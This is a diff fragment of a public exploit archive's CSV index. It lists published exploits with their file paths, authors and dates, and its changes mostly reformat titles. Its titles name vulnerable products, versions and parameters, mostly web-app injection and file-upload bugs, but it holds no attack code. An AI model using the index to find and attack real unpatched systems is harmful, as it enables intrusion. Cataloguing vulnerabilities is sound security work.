Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 Plugin - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0 36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 -36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 +36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36647,platforms/php/webapps/36647.txt,"Lead Capture 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0 36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 @@ -33069,9 +33069,9 @@ id,file,description,date,author,platform,type,port 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 -36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 +36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 -36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 +36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 @@ -33105,9 +33105,9 @@ id,file,description,date,author,platform,type,port 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 -36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 +36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 -36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 +36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 36696,platforms/php/webapps/36696.txt,"Nova CMS administrator/modules/moduleslist.php id Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36697,platforms/php/webapps/36697.txt,"Nova CMS optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36698,platforms/php/webapps/36698.txt,"Nova CMS includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33168,11 +33168,11 @@ id,file,description,date,author,platform,type,port 36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80 -36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 +36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 pfile/kommentar.php filecat Parameter XSS",2012-02-13,indoushka,php,webapps,0 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery",2012-02-13,MustLive,hardware,remote,0 -36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 +36768,platforms/php/webapps/36768.txt,"ProWiki - 'id' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 @@ -33216,7 +33216,7 @@ id,file,description,date,author,platform,type,port 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 36814,platforms/osx/dos/36814.c,"Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 -36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware 'url' Parameter URI Redirection",2012-02-18,sonyy,php,webapps,0 +36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Parameter URI Redirection",2012-02-18,sonyy,php,webapps,0 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 @@ -33232,11 +33232,11 @@ id,file,description,date,author,platform,type,port 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",windows,remote,0 -36830,platforms/php/webapps/36830.txt,"Impulsio CMS 'id' Parameter SQL Injection",2012-02-16,sonyy,php,webapps,0 +36830,platforms/php/webapps/36830.txt,"Impulsio CMS - 'id' Parameter SQL Injection",2012-02-16,sonyy,php,webapps,0 36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 openvpn_users.cgi PATH_INFO XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 dnat.cgi createrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 dansguardian.cgi addrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 -36834,platforms/php/webapps/36834.txt,"Joomla! X-Shop Component 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0 +36834,platforms/php/webapps/36834.txt,"Joomla! X-Shop Component - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0 36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0 36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 @@ -33253,7 +33253,7 @@ id,file,description,date,author,platform,type,port 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x explanation.php explain Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0 -36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component 'controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 +36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component - 'controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0 @@ -33289,7 +33289,7 @@ id,file,description,date,author,platform,type,port 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 -36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 +36895,platforms/php/webapps/36895.txt,"starCMS - 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos,0 36897,platforms/php/webapps/36897.txt,"LastGuru ASP GuestBook 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 @@ -33318,12 +33318,12 @@ id,file,description,date,author,platform,type,port 36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 -36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 +36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 -36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 +36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow",2012-03-08,"Julien Ahrens",windows,local,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 @@ -33392,7 +33392,7 @@ id,file,description,date,author,platform,type,port 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 Plugin - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 -37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 +37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Remote Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0 37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting",2012-03-25,Crim3R,php,webapps,0 37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps,0 @@ -33504,11 +33504,11 @@ id,file,description,date,author,platform,type,port 37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 -37119,platforms/asp/webapps/37119.txt,"XM Forum 'id' Parameter Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 -37120,platforms/php/webapps/37120.txt,"Uiga FanClub 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 +37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Parameter Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 +37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 -37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 +37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 @@ -33523,7 +33523,7 @@ id,file,description,date,author,platform,type,port 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 -37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 +37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 @@ -33572,7 +33572,7 @@ id,file,description,date,author,platform,type,port 37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_layer.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_marker.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 -37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress fs-admin/fs-admin.php Multiple Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -33583,7 +33583,7 @@ id,file,description,date,author,platform,type,port 37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 Plugin - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Plugin - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37205,platforms/php/webapps/37205.txt,"LongTail JW Player 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 +37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 37206,platforms/php/webapps/37206.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 37207,platforms/php/webapps/37207.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.random.php dir Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Parameter Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 @@ -33693,7 +33693,7 @@ id,file,description,date,author,platform,type,port 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 -37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 +37328,platforms/php/webapps/37328.php,"Small-Cms - 'hostname' Parameter Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 @@ -33728,7 +33728,7 @@ id,file,description,date,author,platform,type,port 37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 -37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 +37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 37375,platforms/php/webapps/37375.php,"Joomla! Joomsport Component - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0 37377,platforms/php/webapps/37377.php,"WordPress HD FLV Player Plugin 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 @@ -33776,7 +33776,7 @@ id,file,description,date,author,platform,type,port 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 37566,platforms/php/dos/37566.php,"PHP 5.4.3 PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 -37497,platforms/php/webapps/37497.txt,"Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 +37497,platforms/php/webapps/37497.txt,"Flogr - 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 @@ -33785,7 +33785,7 @@ id,file,description,date,author,platform,type,port 37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0 37430,platforms/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 -37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 +37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin - 'name' Parameter Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting",2012-06-19,indoushka,php,webapps,0 37434,platforms/php/webapps/37434.txt,"e107 FileDownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 37435,platforms/php/webapps/37435.txt,"web@all Cross-Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0 @@ -33796,7 +33796,7 @@ id,file,description,date,author,platform,type,port 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80 37441,platforms/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434 -37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0 +37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component - 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0 37444,platforms/php/webapps/37444.txt,"Cotonti 'admin.php' SQL Injection",2012-06-22,AkaStep,php,webapps,0 37445,platforms/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0 37446,platforms/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80 @@ -33822,7 +33822,7 @@ id,file,description,date,author,platform,type,port 37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0 37468,platforms/php/webapps/37468.php,"JAKCMS PRO 2.2.6 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",php,webapps,0 37469,platforms/php/webapps/37469.txt,"LIOOSYS CMS - SQL Injection / Information Disclosure",2012-06-29,MustLive,php,webapps,0 -37470,platforms/multiple/webapps/37470.txt,"SWFUpload 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 